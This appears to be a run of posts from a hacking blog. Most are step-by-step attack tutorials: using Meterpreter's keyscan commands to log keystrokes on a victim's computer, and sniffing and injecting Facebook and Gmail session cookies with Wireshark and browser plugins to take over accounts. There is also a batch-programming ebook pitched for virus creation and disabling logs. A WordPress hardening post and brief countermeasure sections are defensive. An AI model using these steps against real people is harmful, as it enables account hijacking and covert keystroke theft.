From A Minor Bug To Zero Day - Exploit Development

While searching on Youtube related to buffer overflow vulnerabilities, I came across an excellent presentation by Math Ahroni on Defcon which explains the complete life cycle of the exploit development, from a simple bug  to a Zero day, The presentation explains the whole process of exploit development from the process of fuzzing, location a bug, use of egg hunters etc.


The vulnerability explained in this presentation at Defcon is a HP NNM buffer overflow exploit, however it's not as easy as it looks at first, The author had to go in lots of pain and complications in order to make this exploit working.

War Texting Allows Hackers To Unlock Car Doors Via SMS

Senior iSec researcher Don Bailey has developed an exploit which can allow the attacker to unlock car doors, hack car alarm system and even start their car, this method has been named as "War Texting", it took a time span of less than two hours for Don Bailey to hijack into Car's Alaram system and remotely start the car.


Resources claim that bailey will demonstrate this hack next week in Black Hat Security Conference at Los vegas where he will show the live demonstration of this attack. The presentation is named as "War Texting"

According To ISEC partners

We are seeing more GSM [Global System for Mobile Communications]-enabled systems popping up in consumer culture and industrial control systems. They're not just in Zoombak [Global Positioning System] location devices and personal security control systems, but also in sensors deployed for waste treatment facilities, SCADA [Supervisory Control and Data Acquisition] and call-back systems, physical security systems, industrial control systems

How To Learn Batch Programming Fast And Easy

Batch Programming is extremely helpful if you want to automate small tasks, Batch programming is though only restricted to windows platform but it has lots of other uses and the best part is that it's very easy as compared to other programming languages, While browsing on google for batch programming related e-books I came across a fantastic book which teaches batch programming from the very beginning to advanced level, The book is named as "Batch file programming" and is one of the very comprehensive books on batch programming i ever read.

What are batch files?

Before you jump and download this e-book, I would like to give a short introduction of batch programming, Batch files are basically composed of sequence of DOS commands, Batch files can be easily identified by a .bat extension.

Batch File Programming Can Help You Accomplish the following Attacks

• DNS Poisoning
• Packet flooders
• Dictionary attacks
• Virus Creation
• Disabling of logs

Click here to get your hands on this wonderful e-book.

How To Use A Keylogger Inside Metasploit Using Meterpreter?

Well, I have made lots of posts on keylogging indeed I have dedicated a whole book to this topic "An Introduction To keyloggers, RATS And Malware" which is available as a free download, Now If you are a regular reader of this blog the chances are very less that you might not know about keyloggers as I have written about it over and over agai. However in this post I will guide you simple ways to use a keylogger inside Meteasploit once you have opened up a meterpreter session with victims computer.  For those of you who don't know what metasploit is kindly refer the post "Metasploit For Beginners Explained"


What is a Meterpreter?

Basically a meterpeter is a simple type of interface which helps us in compltety automating the exploitation process. If you would like to learn furthur about meterpreter kindly do a google search.

Requirements

• Metasploit Framework
• BackTrack 5
• A Meterpreter session opened on a box

How To Use A Keylogger Inside Metasploit Using Meterpreter?

In this case I am using metasploit framework from backtrack 5, Backtrack 5 is an awesome linux distro which is specially dedicated to hackers and penetration testers, I have used Social Engineering Toolkit to utilize a browser autopwn in order to open up a meterpreter session on the victims computer.

Step 1 -  Before we start the keylogger and start capturing logs, we would need to migrate explorer.exe process as we don't want the our exploit to get closed, In order to migrate the process we would need the PID of the process, In order to get the PID type "PS" on the command line.

Step 2 - Once you know the exact process PID type "Migrate" command along with with the PID so incase if the PID is 1372, you will type "Migrate 1372"

Step 3 - Now just type "Keyscan_start" to start the keylogger.

Step 4 - Now just sit back and relax, In order to harvest keystores all you need to do is type the "Keyscan_dump" command.

I have you have liked this post and learned some thing new today, If you would like to re-publish this article on your website/blog make sure that you give a proper credit.

Securing To Wp-Config File To Prevent Your Wordpress Blog From Getting Hacked

If your blog has been hosted on wordpress then your blog is more vulnerable than other blogging platgorms, The reason is that by default the wordpress security is very low and can be compromised easily, Before writing this post I made a little search on the web related to "Wordpress Security" and really found some foolish tips out there which would really not help you in any means. So I decided to write a post own my own, There are lots of wordpress admins who use plugins such as login lockdown along with many other plugins to prevent brute force attacks on wordpress, The problem is that now a days a hacker will not use a bruteforce attack or dictionary attack for hacking a wordpress blog, because now a days almost every one atleast has a password of more than 8 characters, and even if some one has a weaker password too, the brute force attacks and Dictionary attacks will be automatically blocked by your webserver, As they have iDS and IPS configured to these kinds of requests automatically.

Phising attacks are also not very common with wordpress blogs and I have seen very rare cases in which wordpress users have fallen for phishing attacks, but almost every time a wordpress user will login into the dashboard by manually adding wp-admin to the end of the url, There are possibliles that wordpress users can be attacked by phishing attacks, but bloggers are already a bit tech savy and won't fall for these types of attacks, Alternatively if the hacker is smarter and can implement more advanced types of phishing attacks like desktop phishing ,tabnabbing or Dns Spoofing then there are chances that the wordpress user will fall for these attacks.

So How Do Hackers Hack Into Wordpress Blogs?

Most of the skilled Hackers will target your wp-config as it's in an unsecure place by default. Wp-config file is the most important file present on your wordpress blog. It holds very sensitive information such as including your database access, table prefix and Secret Key, So in order to protect your wordpress blog from getting hacked you would need to harden your wp-config file. Here is how a wp-config file looks inside, As you can see from looking into it that it contains very sensitive information.

Protecting Wp-Config File From .htacess

The first step you should take write away is to add the following code to your .htacess file, This is the first step you should take in hardening your wordpress.

# protect wpconfig.php
<files wp-config.php>
order allow,deny
deny from all
</files>

Changing The Permission

Last week I came across a wordpress blog, whose permission for wp-config file was set to readable, All the hacker needed to do is to upload a mysql database and use those to access victim's wordpress blog. So the bottom line is that the permission should not be set to readable, it should be set to something like "400".

Security Keys

Security keys were added in wordpress 2.6 to ensure better encryption of information stored in the user's cookies, A secret key also includes makes it harder to crack your passwords, If some how the hacker gets hold of your wordpress hash, You can get your secret keys from here, All you need to do is to add these secret keys to your wp-config file.

Moving Your Wp-Config File

By default Wp-Config is located in the root folder, Wordpress themselves recommend users to move their wp-config file to some other place such as outside the root folder, This will prevent the Symlink bypassing attack to the some extent.

Moving To VPS Or Dedicated Host To Prevent Symlink Bypassing Attack

If your wordpress blog is on a shared host then it will be alot more vulnerable to symlink bypassing attack than on VPS or dedicated, If your blog is quite established and you can afford to move to VPS or dedicated hosting, Then I would recommend to move it right away.

I hope you have liked my post on Wordpress security, If you are looking for some more ways to protect your wordpress blog, I would recommend you reading the following post:

• How To Secure Your Wordpress Blogs?

Facebook Cookie Stealing And Session Hijacking

Three days ago I finished the series on Gmail Session Hijacking and Cookie Stealing , due to a tremendous response of readers I planned to write a post on Facebook cookie stealing and Session hijacking. Facebook session hijacking can also be accomplished via a very popular tool called Firesheep(On a Wifi Network Only), which I won't be explaining here because I have already written it before in my post Facebook Hacking Made Easy With Firesheep
In this tutorial I will explain you how an attacker can capture your authentication cookies on a local area network and use them to hack your facebook account,  Before reading this tutorial I would recommend you to  part1, part2 and part 3 of my Gmail Session Hijacking and Cookie stealing series, So you could have better understanding of what I am doing here.

• Gmail Cookie Stealing And Session Hijacking Part 1
• Gmail Cookie Stealing And Session Hijacking Part 2
• Gmail Cookie Stealing And Session Hijacking Part 3

Facebook Authentication Cookies

The cookie which facebook uses to authenticate it's users is called "Datr", If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:

Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;

How To Steal Facebook Session Cookies And Hijack An Account? 

An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account.

If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain access to victims account.

In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark.

Step 1 - First of all download wireshark from the official website and install it.

Step 2 - Next open up wireshark click on analyze and then click on interfaces.

Step 3 - Next choose the appropriate interface and click on start.




Step 4 - Continue sniffing for around 10 minutes.

Step 5 - After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.

Step 6 - Next set the filter to http.cookie contains “datr” at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie.

Step 7 -  Next right click on it and goto Copy - Bytes - Printable Text only.

Step 8 - Next you’ll want to open up firefox. You’ll need both Greasemonkey and the cookieinjector script. Now open up Facebook.com and make sure that you are not logged in.

Step 9- Press Alt C to bring up the cookie injector, Simply paste in the cookie value into it.

Step 10 - Now refresh your page and viola you are logged in to the victims facebook account.

Note: This Attack will only work if victim is on a http:// connection and even on https:// if end to end encryption is not enabled.


Countermeasures

The best way to protect yourself against a session hijacking attack is to use https:// connection each and every time you login to your Facebook, Gmail, Hotmail or any other email account. As your cookies would be encrypted so even if an attacker manages to capture your session cookies he won't be able to do any thing with your cookies.

Wordpress 3.2 Released - Much More Secure

Wordpress has just released wordpress 3.2 a couple of hours ago, Wordpress 3.2 comes with lots of major and minor bug fixes. Wordpress 3.2 is much more secure than previous versions as it comes with lots of security patches and fixes. WordPress 3.2 requires a minimum of MySql 5.0.15 and PHP 5.2.4. If you are facing some errors kindly contact your hosting immediately.




Wordpress 3.2 also comes with a very neat and clean design, with a fully refreshed admin design, a full screen editor for distraction free blogging

According to WordPress officials:

WordPress 3.2 in 40 words or less: WordPress comes with a refreshed admin design, a full screen editor for distraction free blogging, a new default HTML theme and an extended admin bar.

Gmail Cookie Stealing And Session Hijacking Part 3

So friends, This is the third part of my Gmail Session Hijacking and Cookie Stealing series on RHA, In the first part I introduced you to the basics and fundamentals of a Session Hijacking attack, In the second part I introduced you to the variety of methods used to capture session cookies. In this part I will tell you how to carry out a session hijacking attack once you have the session cookies.

Cookie Injection With A Firefox WebBrowser

Now there are variety of plugins used to inject cookies in your browser, depending on which browser you are using, I would recommend you the use of firefox browser as it supports vast number of cookie injection plugins.

Web Developer Toolbar

Webdeveloper toolbar is an addon for the firefox browser it makes the process of injecting cookies extremely easy. All you have to do is to install the webdeveloper toolbar, Click on the cookies drop down menu and click on the cookie you want to edit.

Once you have clicked on the edit cookie option, You will be brought to the following screen:

Next replace your cookie value with the victims cookie value.

Wireshark Cookie Injector

Now if you have captured cookies using wireshark, then instead of using Webdeveloper toolbar, you can use Cookie injector to inject session cookies directly in to your browser. All you need to do is to press Alt+C after installing the cookie injector and then just paste the wireshark cookie dump and press ok. After you have done so, Just refresh your browser and you will be in victims account.

Note: In order to install Cookie injector script you would need to first install Greasmonkey plugin for firefox

Cookie Manager V1.5.1

CookieManger is one of my most preferred choice for performing a Session hijacking hijacking, Since it's very user friendly and extremely easy to use. You can view CookieManager's usage guide here.

Cookie Injection With Google Chrome

If you are too lazy to use firefox for cookie injection, then luckily there are few extensions on google chrome used to inject cookies into your browser and take control of the victims account. One of my favorite cookie injecting extensions is Cookie editor by Philip, It sports a very unfriendly interface.

Drawbacks of Session Hijacking Attack:

With so many advantages of a session hijacking attack there are some drawbacks that you also need to know.

1. First of all cookie stealing becomes useless if victim is using a https:// protocol for browsing and end to end encryption is enabled.

2. Most of the cookies expire once the victims clicks on the logout button and hence the attacker also logs out of the account.

3. Lots of websites do not sport parallel logins which also makes cookie stealing useless.

Protection Against A Session Hijacking Attack

The best way to protect yourself against a session hijacking attack is to use https:// connection each and every time you login to your Facebook, Gmail, Hotmail or any other email account. As your cookies would be encrypted so even if an attacker manages to capture your session cookies he won't be able to do any thing with your cookies.

So freinds, I hope you have enjoyed the Gmail Session hijacking and cookie stealing series, Depending on readers response I might make a tutorial on Facebook Session hijacking too. If you have any questions feel free to ask.